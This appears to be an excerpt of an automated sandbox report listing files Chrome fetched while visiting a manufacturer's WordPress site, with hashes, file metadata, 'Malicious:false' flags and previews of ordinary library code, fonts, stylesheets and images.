                                                                            Preview:/*!. * accounting.js v0.4.2. * Copyright 2014 Open Exchange Rates. *. * Freely distributable under the MIT license.. * Portions of accounting.js are inspired or borrowed from underscore.js. *. * Full details and documentation:. * http://openexchangerates.github.io/accounting.js/. */.!function(n,r){var e={version:"0.4.1",settings:{currency:{symbol:"$",format:"%s%v",decimal:".",thousand:",",precision:2,grouping:3},number:{precision:0,grouping:3,thousand:",",decimal:"."}}},t=Array.prototype.map,o=Array.isArray,a=Object.prototype.toString;function i(n){return!!(""===n||n&&n.charCodeAt&&n.substr)}function u(n){return o?o(n):"[object Array]"===a.call(n)}function c(n){return n&&"[object Object]"===a.call(n)}function s(n,r){var e;for(e in n=n||{},r=r||{})r.hasOwnProperty(e)&&null==n[e]&&(n[e]=r[e]);return n}function f(n,r,e){var o,a,i=[];if(!n)return i;if(t&&n.map===t)return n.map(r,e);for(o=0,a=n.length;o<a;o++)i[o]=r.call(e,n[o],o,n);return i}function p(n,r){return n=Math.round(Math.abs(n)),
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3031)
                                                                            Category:downloaded
                                                                            Size (bytes):3036
                                                                            Entropy (8bit):5.918345384420359
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:5A3AB858AE169F98B882A04C5FA3D117
                                                                            SHA1:953D646B57F63D200E4D247C738D61BFBAAA68B1
                                                                            SHA-256:A74397297B9901AFD7E81D3C1F7856A04B62630D9AE0C920E6D6068BF6C9E15F
                                                                            SHA-512:F2B2E2FEC0F76E4DCB660D21A1B5058CBF2C8A4D914299015146238CF0853D36090C18408AF1B2FFB73F4ECF5EA16B220F40DEC625C103A0D80149CE181310EC
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=rockland&oit=1&cp=8&pgcl=2&gs_rn=42&psi=fEkl4wVFScdxk_4L&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                            Preview:)]}'.["rockland",["rockland","rockland trust","rockland federal credit union","rockland county","rockland trust login","rockland community college","rockland maine","rockland bakery","rockland ma","rockland electric"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggestdetail":[{},{"google:entityinfo":"CgovbS8wM2g1NGc0Eg9Db21tZXJjaWFsIGJhbmsyZGh0dHBzOi8vZW5jcnlwdGVkLXRibjAuZ3N0YXRpYy5jb20vaW1hZ2VzP3E9dGJuOkFOZDlHY1E3aFBGdDhaTk1ZTktKRlR3RkhJMXFDRUVzYUxrcHdadVV2cnV1Yk1BJnM9MTA6DlJvY2tsYW5kIFRydXN0SgcjMDE2NmEzUj9nc19zc3A9ZUp6ajR0TFAxVGN3empBMVNUZFJZRFJnZEdEdzRpdktUODdPU2N4TFVTZ3BLaTB1QVFDRkl3bEpwFw\u003d\u003d"},{},{"google:entityinfo":"CggvbS8wZm05XxIYQ291bnR5IGluIE5ldyBZb3JrIFN0YXRlMmRodHRwczovL2VuY3J5cHRlZC10Ym4wLmdzdGF0aWMuY29tL2ltYWdlcz9xPXRibjpBTmQ5R2NRbS02WFkxWlFkZVRob0I3Y2xxcjdXWGExMTV1R0dqOElkbmpmZWMwOCZzPTEwOg9Sb2NrbGFuZCBDb3VudHlKByM3NjdiMmZSOWdzX3NzcD1lSnpqNHREUDFUZEl5N1dNTjJEMDRpX0tUODdPU2N4TFVVak9MODBycVFRQWMyMEpFd3AM"},{},{"googl
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1572)
                                                                            Category:downloaded
                                                                            Size (bytes):23176
                                                                            Entropy (8bit):5.320760377206205
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:6EBEE786687BCAA64FCB714C20E25FE2
                                                                            SHA1:13F0C3BBEAEDA59EBD1D10269437037043C3A9B3
                                                                            SHA-256:43FC587D4C7860E824A47A42FC2B758455429AAF36B6EEB270D7CFB6A8975C56
                                                                            SHA-512:BDF486B86BB00BB88E495D984FA28D18EF37026DBD3AB5DCC7D60FCCA4181C27414B04A81FCA95D4E0BE8A0E7D6D2FD1E3AB7AB7F065D1B6A0CE4207F8FB2653
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700&subset=latin%2Clatin-ext
                                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Open Sans';. font-style: normal;
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (39865), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):39865
                                                                            Entropy (8bit):4.998871006425931
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:1783FB16189F6A859A0B1C967772E86D
                                                                            SHA1:4D5247D23D2C539B7C8DDFB76C9FA8AFE56FB6CD
                                                                            SHA-256:8CB9BC9CF917908E89867751AD1E3D4500D1AA893AC27D4D7B9FA9283BEABB23
                                                                            SHA-512:D3E0DB985A1EA28E41D23707520B955CCFF9FBCF1EFCDAA59B84A84E5F52D63CF35EEA746B55E31D0558E9E9C5A24311B609B7FAB493D6853B318953AC049D1F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/plugins/flickity.css?ver=17.0.3
                                                                            Preview:.flickity-enabled{position:relative}.flickity-enabled:focus{outline:0}.classic_enhanced article .flickity-viewport{transform:scale(1.01);-webkit-transform:scale(1.01)}.nectar-flickity:not(.masonry) .flickity-viewport{overflow:hidden;position:relative;height:100%;margin:80px 0}.wpb_gallery_slidesflickity_static_height_style .nectar-flickity:not(.masonry) .flickity-viewport{margin:40px 0}.nectar-flickity[data-controls*=arrows_overlaid]:not(.masonry) .flickity-viewport{margin:50px 0}.nectar-flickity .nectar-fancy-box[data-n-parallax-bg=true] .box-bg,.nectar-flickity.nectar-carousel[data-format=default][data-wrap=no-wrap].transition-enabled .flickity-slider,.nectar-flickity:not([data-wrap=wrap]) .cell>.nectar-el-parallax-scroll .img-wrap,.nectar-post-grid.nectar-flickity[data-wrap=no-wrap].transition-enabled .flickity-slider,.wpb_gallery_slidesflickity_static_height_style .nectar-flickity.flickity-enabled:not([data-wrap=wrap]) .flickity-slider,.wpb_gallery_slidesflickity_style .nectar-flic
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:GIF image data, version 87a, 1 x 1
                                                                            Category:downloaded
                                                                            Size (bytes):35
                                                                            Entropy (8bit):3.066054462414549
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:729C3007A8ED0597531B0C76D54A94BB
                                                                            SHA1:90FE9B8A8142548FDFAB29F59CB0A164A0EAEF81
                                                                            SHA-256:6A842EA462DACA2A0B5A0F5F25BCFC8E0059AC811CA6C6A1BC54E4D9119621C3
                                                                            SHA-512:AC44DA7F455BFAE52B883639964276026FB259320902AA813D0333E021C356A7B3E3537B297F9A2158E588C302987CE0854866C039D1BB0FFB27F67560739DB2
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://pluralism.themancav.com/YzqqRBgYyS0HGJB2VQ6GZhBOzzRBAIgoAlTOLQ1d9TcXW943QRaINxcYkHVPGNhmWRjGJQZQ0iUWQMQpFlPQMhRYw2Ye
                                                                            Preview:GIF87a........jl...,...........D..;
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):434
                                                                            Entropy (8bit):7.476218464102703
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:5B2F229F2447285A25ABAABCF92D8504
                                                                            SHA1:AFEAF50D1BE72F1032888F9E65CEB189C9A83639
                                                                            SHA-256:DFFA8F27587A66490697F5B0F892F7C3501E1FE458E7932B9F1F17F3D6F59A21
                                                                            SHA-512:1EFEE2121034E8660DEC56C45D15D77643D3A49940F5C90CE4A792E609D6E0A946518379E7F5058CA645E0BDA4BBB2A43EF9538C275AF6E2A2009228D3ED5912
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/09/skid-steer-dark.png
                                                                            Preview:RIFF....WEBPVP8L..../c....`.m...`.?....m.^.1. 73m...c.An.". ...@.OQ4...jw53nK[..._..00.I.CX<rw.X.mU...$..(G.......]......=....t.....=......I...R.U.=.3..Bx...7.a....)Hm.....w.M.oJI.A@..wUY.#...#..m.o..*.Xt.Y.|k.....Bk........T.2.h.f...}R.....F..m..4A....W.{..{....i.}.db...I2....F$..(t..=....VE%.8.0{#....8.l.6...K.g...jJ..r.?...0.Q^W.[...M)...c./.../L...\X...9K..F....C:;.j]..\9.8.g&..LGU.d9...(....-d....F..s.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (7382), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):7382
                                                                            Entropy (8bit):4.92387221708028
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:32305EEDA843EA6596ECD9D22D180034
                                                                            SHA1:0CFCBEB319694D59CB2D529281CD882E36C2B2A2
                                                                            SHA-256:05C66A9DCF78FBB4072315796DE8212869DFEB3353069C9DB772730CD698E559
                                                                            SHA-512:22B1E9186EF0DAB14F1B5B05108030DCD4079BCD93817CC349CABF610ED59C1657DD2187681A913DD6051C4E464DD857E6685B1F774FFDEC45A1C6D77848DD44
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/off-canvas/slide-out-right-material.css?ver=17.0.3
                                                                            Preview:#slide-out-widget-area.slide-out-from-right .inner-wrap{opacity:0}body.material-ocm-open #slide-out-widget-area.slide-out-from-right .inner-wrap{opacity:1}#slide-out-widget-area.slide-out-from-right #slide-out-widget-area .inner>div,#slide-out-widget-area.slide-out-from-right .inner-wrap>.inner{width:auto}body[data-slide-out-widget-area-style=slide-out-from-right] #slide-out-widget-area .off-canvas-social-links li:first-child a{padding-left:0}body[data-slide-out-widget-area-style=slide-out-from-right] #slide-out-widget-area .off-canvas-social-links li a i:after{z-index:10000}body[data-slide-out-widget-area-style=slide-out-from-right] #slide-out-widget-area .off-canvas-social-links li{padding:0}body[data-slide-out-widget-area-style=slide-out-from-right] #slide-out-widget-area .off-canvas-social-links li a{height:24px;display:block;width:auto;line-height:38px;opacity:1;padding:0 14px;box-sizing:content-box;text-align:center}body[data-slide-out-widget-area-style=slide-out-from-right] #sli
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (64995)
                                                                            Category:downloaded
                                                                            Size (bytes):72789
                                                                            Entropy (8bit):5.410563418861247
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:511CF10E60B2939B806F5B6D324A32FC
                                                                            SHA1:15F3E8416817DB2D432390563022707E72EC329F
                                                                            SHA-256:3DAEC2FC4311D530E0D2BEDDF805A21A16CB27773C1EFE105622FD0667996A0D
                                                                            SHA-512:2326D78C2124095CB171762BE26BA3E44CDDA347849302151474AC8A43657B5A4654FAC8DAC4ACB85BD3AF146070A684531E794A2B11A1BC1BD05F6143E5B4F3
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://js.hs-banner.com/v2/47864039/banner.js
                                                                            Preview:var _hsp = window['_hsp'] = window['_hsp'] || [];._hsp.push(['setBannerSettings', {}]);._hsp.push(['setCustomizationSettings', {}]);._hsp.push(['addCookieDomain', '.hsforms.com']);._hsp.push(['addCookieDomain', '.rocklandmfg.com']);._hsp.push(['addCookieDomain', '.hs-sites.com']);._hsp.push(['addCookieDomain', '.hubspot.com']);._hsp.push(['addCookieDomain', '.hubspotpagebuilder.com']);._hsp.push(['setApiBaseUrl', 'https://js.hs-banner.com/v2']);./**. * HubSpot Cookie Banner Code Copyright 2024 HubSpot, Inc. http://www.hubspot.com. */.!function(){var e=[,function(e,t){var n;function o(){var e,t;t=arguments[0]||{};this.config={};this.config.elements=t.elements?t.elements:[];this.config.attributes=t.attributes?t.attributes:{};this.config.attributes[o.ALL]=this.config.attributes[o.ALL]?this.config.attributes[o.ALL]:[];this.config.allow_comments=!!t.allow_comments&&t.allow_comments;this.allowed_elements={};this.config.protocols=t.protocols?t.protocols:{};this.config.add_attributes=t.add_at
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (28733), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):28733
                                                                            Entropy (8bit):5.184839973231571
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:71E1E374FA17B9BABB925E83B3E63167
                                                                            SHA1:912E595E9D1DAF4D681C6D06AA720D5F99DB1F6C
                                                                            SHA-256:564774395D433175588447063862520BA56F604DB2AD55D945FCF8BEDA02BD4A
                                                                            SHA-512:3C15B451D521A8AC344D146187254FC5B1F895A021F01E8EA9CE4F07B64A8AB6490312887CAB1A16486377858AA8EE3A0136C15475843301060B2DC5837C6545
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/instagram-feed/js/sbi-scripts.min.js?ver=6.6.0
                                                                            Preview:var sbi_js_exists=typeof sbi_js_exists!=="undefined"?true:false;if(!sbi_js_exists){(function($){function sbiAddVisibilityListener(){!function(i){var n={callback:function(){},runOnLoad:!0,frequency:100,sbiPreviousVisibility:null},c={};c.sbiCheckVisibility=function(i,n){if(jQuery.contains(document,i[0])){var e=n.sbiPreviousVisibility,t=i.is(":visible");n.sbiPreviousVisibility=t,null==e?n.runOnLoad&&n.callback(i,t):e!==t&&n.callback(i,t),setTimeout(function(){c.sbiCheckVisibility(i,n)},n.frequency)}},i.fn.sbiVisibilityChanged=function(e){var t=i.extend({},n,e);return this.each(function(){c.sbiCheckVisibility(i(this),t)})}}(jQuery)}function Sbi(){this.feeds={};this.options=sb_instagram_js_options}Sbi.prototype={createPage:function(createFeeds,createFeedsArgs){if(typeof sb_instagram_js_options.ajax_url!=="undefined"&&typeof window.sbiajaxurl==="undefined"){window.sbiajaxurl=sb_instagram_js_options.ajax_url}if(typeof window.sbiajaxurl==="undefined"||window.sbiajaxurl.indexOf(window.location.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit gray+alpha, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):2082
                                                                            Entropy (8bit):7.8872803309343995
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:BA044AC77FE366ABEEC0DFE8FD6D079C
                                                                            SHA1:CE056CF467AA6CA1AD5240B1CC43E87D940C1FCF
                                                                            SHA-256:1C751086291F8BEB996179C41C6138D128637980CF7C0A74737C54E0A0669FD4
                                                                            SHA-512:C752085E7B6D8A67B93066B70F014B803C620FBDC8CD956716B126E62DB64A65C2E7B8DC5CEF3C9473CF62A29DADBD8003E80EF5D4998D93CE2C56814844810F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR.......A........H....IDATx..[o.F......(..H.(..e.h..h..k.8...N.#M.\...vwS...].c...(...W...83.(..-:.Abx.p...s.P2p8.....p8.....p8...C...X...O....S.m..rCFup.%W...e...jpQ..\.?.;.UQu.3..m..M#kj....m%.7....$....)..j..2.y[=..`....).^.]B..(...}%...%.v.T..........R.?Vs..\...U..K..I..S.z.....2K....l+e..r...z..Z..[.0.#.E..Pa..J.,).j.9.....7)p..../.i.\v.w....U......(xX....0pMz..=.`QQ.%k".....-.............m..LH.d}.KMB..=Q..$..o.0'...K.M..t.7*`.!h...]`...F...LT].......h.....!..LH..(.a.....c..l.s.<...o.N.n.oz^.....I.N{.=.S.&*d..ae..Zx..Q....Jx)....2.kqp.....a...>.....v....3..L.O...k.......l.Q...kEd.Y.'..%..n.Rn.23._eaB...y..UTr....(..z..........kySQU...`M..!..,.n..<..!...........&.....[u.^_.'.C.t......Z.LT..."s...dp`X...G`.%.;a..i=...BsAR.l...*...i..GO..|g....TT.$c...^...Cp....l.E.b...L.fN.../..p..C..*.X.... ..#9..v..2Q-.?...r...7t.d......i.i.,x...g/q.x:7h..yN-:;"LY+-.u......#..G...D..w.y..W.&.d...0.......a."......W.w."..d....}.GYAKD../..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (11083), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):11084
                                                                            Entropy (8bit):5.024606819948612
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:2B4160A5466FE5914370B6795E7A8B77
                                                                            SHA1:79AEB3848B7B6620B743781AB3B614FC9C727870
                                                                            SHA-256:83B1E0A0CC92672A27B8FC074CE45FFAE18711E3A6ED5448DA47D75979499DCA
                                                                            SHA-512:35609A7EE9170A54BA7CA721E9B48C97F5AF3F366B0F538631FD683009C5617492299EE181EB3096CFABE1274AE1B1496AE5709AF15FEC794CC238B64EC8D138
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/yith-woocommerce-ajax-product-filter-premium/assets/css/ion.range-slider.css?ver=2.3.1
                                                                            Preview:/*!Ion.RangeSlider, 2.3.1, . Denis Ineshin, 2010 - 2019, IonDen.com, Build date: 2019-12-19 16:51:02*/.irs{position:relative;display:block;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;font-size:12px;font-family:Arial,sans-serif}.irs-line{position:relative;display:block;overflow:hidden;outline:none !important}.irs-bar{position:absolute;display:block;left:0;width:0}.irs-shadow{position:absolute;display:none;left:0;width:0}.irs-handle{position:absolute;display:block;box-sizing:border-box;cursor:default;z-index:1}.irs-handle.type_last{z-index:2}.irs-min,.irs-max{position:absolute;display:block;cursor:default}.irs-min{left:0}.irs-max{right:0}.irs-from,.irs-to,.irs-single{position:absolute;display:block;top:0;left:0;cursor:default;white-space:nowrap}.irs-grid{position:absolute;display:none;bottom:0;left:0;width:100%;height:20px}.irs-with-grid .irs-grid{display:block}.irs-grid-pol{position:absolute;top
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 24064, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):24064
                                                                            Entropy (8bit):7.991281081926899
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:562993773F212D0B11FBCBE2AEE33ABA
                                                                            SHA1:5AC8EA32AD1434F65D9DEBA384986BA07E6592A2
                                                                            SHA-256:7C5CFCBD829200FF3C2A547CDC10B61C27341E5AF6B7A4434BBC6674E7B70B66
                                                                            SHA-512:A48C59BF834869BE53906E6A9394C1E58AC970AC74EA2720DB2DD03972C5931AD93E70564889680692EE0445C0072FA12C0A721303618654C1CC617C6B755277
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://fonts.gstatic.com/s/leaguespartan/v11/kJEqBuEW6A0lliaV_m88ja5TwvZwLZk.woff2
                                                                            Preview:wOF2......^...........]...........................r..F..&?HVAR.o.`?STAT..'2.../~....l.z..x.0.d.6.$..l. ..,..@...C..l.F.....=.G0....@2..DQ#9. ..?.7d...n{u..,7..V..T.P..O.S..A.6....../zHx#.^_..)..G.....^..H.....T..J4\e...Hd.F...4..$..7.\..R(.R.a.E.%.glV..d..n=Bc.....k...9..;.`..6......&.(Qym*>..I=iD.&.>..mR.+.....y\.xO.OF\......$MS8....'..t.h.k.*.@y...C...X....'f..C...[..kM.......N..ix.........(].W4..]bks..v4.i...+TU..,.......Q.A.....`._D.k6j.0`...I.>.h9T.8.V...B.........Y%1b..1.A.<......f` >y............E..R"...........w...o..}nUI=R.. ..A..z.0C..u%.3..0H.a.9..k..o...s..M.....5...k.S.Ba.p{c...=..... *.K.U.....MvK.8.J.,J..=.....M.Yu.Q..P..VC$*?..KE4GuYU..G....z.w.+hvcud....l..S.pM..O.A....iN...;5....w`.$...........d..7.l...GP..(....3f.'.R..:.1.U.......K.......s %....%p..2.@.x)...... @.S...b.S.r.q.J..+.+.tS.X...U!...5}....Zq.ex.L6..n.H.h..8......e.@..X..7M..:.....G0.y..../...1%.QTY.Z.}~.{..R.)...4a.........[...!...*.v...>.S:..$ RN.R.jRr.JZv^.b.iv.E..u
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):830
                                                                            Entropy (8bit):7.500748507584108
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:6BA6013FB9528F0F8DAF543EA02F3AD1
                                                                            SHA1:69D2CBABD992C20E8CE9021EE22EB71E11AC09FA
                                                                            SHA-256:371890AB64E111F3291887CC1116C34059B2348D1C7D0FAE6079B2C3347A9B83
                                                                            SHA-512:1BE9D1B0F347F6A39E7C20F29F997E18FF2C7B3E2205A9B02DB81A557A52A3D8A711D0C08816569A87BD3EFE9A37755EA0BC4102AA67CE3553C09B32512210AD
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/02/case.png
                                                                            Preview:.PNG........IHDR.......A.....v+.....$PLTE.....................................X.G....tRNS........%)-3..8!....IDATx.....*..P..o.....i......a......bd....^.W...y|sS.L+.M....i...{tR......F.*.d4C.r..B..Lo.Ct...e.a.y....gCB...2..H.}..S..R..!...8...X..sD.....C...Tr.....`.%.b).PK9!..6*F.D.t.a`..*....ii....=..r0....M.t&.......adR.P.d..G..i........w.P.......t.j.G.d.....bd...+..jZ......FVZ+.......v.j.[+.!|^..]...6g\.........J...*q....'@_...T6.U..2v..3m...c].22Bk.)U6..)F...<..a...Uy....d5..&..Pd.]..P'..?.K-b..\...2...(n..Z..i`........J......#.......*?3.?..[G c..8.C"....$~5..N...L..N[........2%m...........HQ..2.cT..H."=......U.H......R,.%k..c..ORh./H5Z..a....z.H%.>t..6RLg....3..>...&<...f.3Z..H.o....TL..S..G./X..2Djx.xj....'k.L..^.<Z$..=.T+.....G+....3...}.?@.P..U.......z..Z.....?....IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (14979), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):14979
                                                                            Entropy (8bit):4.961997146989962
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:ECF4AF1872883451FD0420A2902C80D4
                                                                            SHA1:92AE5AF49582FAB7FC7D82DB93AB72CA8F3F3065
                                                                            SHA-256:7A2ADF4C1187FF44AFB6596A750C078A97B07717364DAADE11A8C337771832E0
                                                                            SHA-512:B862154223453FBE5578071A43ED2978EEC5249515654F61935F1749679673EB5AA56B7371E5FE6CDE05E27528CAD6EEA215765F979D49FB66A2CE82754D293F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/wp-store-locator/css/styles.min.css?ver=2.2.241
                                                                            Preview:@font-face{font-family:wpsl-fontello;src:url(../font/fontello.eot?28897909);src:url(../font/fontello.eot?28897909#iefix) format('embedded-opentype'),url(../font/fontello.woff?28897909) format('woff'),url(../font/fontello.ttf?28897909) format('truetype'),url(../font/fontello.svg?28897909#fontello) format('svg');font-weight:400;font-style:normal}#wpsl-gmap{float:right;width:66.5%;height:350px;margin-bottom:0}.wpsl-store-below #wpsl-gmap{float:none;width:100%}.wpsl-gmap-canvas{width:100%;height:300px;margin-bottom:20px}#wpsl-reset-map:hover{cursor:pointer}#wpsl-gmap div:not[class^=gv-iv],#wpsl-gmap img,.wpsl-gmap-canvas div:not[class^=gv-iv],.wpsl-gmap-canvas img{box-shadow:none!important;max-width:none!important;background:0 0}#wpsl-gmap img,.wpsl-gmap-canvas img{display:inline;opacity:1!important;max-height:none!important}#wpsl-gmap *{box-sizing:content-box!important;-webkit-box-sizing:content-box!important;-moz-box-sizing:content-box!important}#wpsl-gmap div.gm-iv-marker,.wpsl-gmap-can
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):1343
                                                                            Entropy (8bit):7.758031094093679
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:9A8DB5827F0FFA26C47D84B889FECA14
                                                                            SHA1:251C4B719B5DDB7457069FAC0673B59D041A3A8E
                                                                            SHA-256:A789BD1B39D39A7CDA8A972FEBAE06D5CA7694D438AB59216205E902A962FC22
                                                                            SHA-512:15158170E2F0D90825DBD0349B23B7CE798AC095DF390EE0BD6A0F18A3440C076E4DE1A439104F92D55548C243D6A34C7885FAF300C7F7EAD18509176F598873
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR.......A.....v+......PLTE.................___OOOmmmPPP???///999rrrEEEhhhDDD999...NNN...111'''```kkkMMM...............vvvnnn......SSS{{{...jjj...sss...$$$...GGG...!.K.....tRNS......&)..3.0.0.--..102"..$-!..23..&.3$.!333+.IA>....6IDATx...mS.H.....q.L..s.<L..!...].CH@t...b...q .....l6..f..lv.^.@.<;..-...L_.34....Tb.i................v'..&ls.q4..p.vJ]/.....D...K.o.tSM.+..|.O=...........W..I.7y......SUv...Z{>.....\1.J.u..Q........{.m&..xd.b..:.......}.w.e......."Dt..`-W.*-1..`...k.s&.......T..5...5..M.&.g....{....T<J....#..Nd.... .F..R............l*....u~.J.S..........T.8..XR..S.X\.6...50..,...Ij...zi..$|.6.k...ykUCF.E.!.K..IU../..:8IM4.....S.;.j..T.......A..LR{.....U....<iR)>.RU5.....5.$.-...1..u......T.;>.QYs.e...Y$.f._..:-J..^R.I...y.*..;Q}......W....bH...S%..;I.Ij.....vc..(...zQjyH....\.,b.?.2..tLEb.Xb-@a...ny^.c*...!.....".V.S..u..j.$dVq?.y&.d.....U.........7S.'...>MS....:..U-....zj.Cj[.......X.....S.+.mp.......2....}.@.Zb%.-.... ..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):174229
                                                                            Entropy (8bit):5.03360000849351
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:83E74B49A18E390062C2A7F631659871
                                                                            SHA1:32ADBA629BB0D55B32AB5E379120AC8359F272B9
                                                                            SHA-256:60838F26FB320B320ADDF4E7B54B07B6F398C4FEA11FB977F8EF33BCE7AC2297
                                                                            SHA-512:D1AB69D278924BDCDD154A2C9FEDBDBE3F681C45137FF27DE209C0AF9EECFE14C6945E06D34E5A0BAE6648C8E235DA2A1D73D3C7F99EE2B01E48D25547B1E051
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/style.css?ver=17.0.3
                                                                            Preview:a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}input[type=submit]{-webkit-appearance:none}html{max-width:100%;overflow-y:scroll;overflow-x:hidden}body{max-width:100%;overflow:hidden;background:#fff;font-family:'Open Sans',Helvetica,sans-serif;color:#676767;position:relative}ol,ul{list-style:none}input[type=text]::-ms-clear{display:none}sup{font-size:.5em;vertical-align:super}sub{font-size:.5em;vertical-align:sub}p:empty{display:none}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}*{-webkit-box-sizing:border
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):180
                                                                            Entropy (8bit):5.009467197819319
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:3B0821A8DB0E4FC104D8CE5B7E07A9F4
                                                                            SHA1:3BE1E1C71247F96CE391A4A3971B5DA8A59C459A
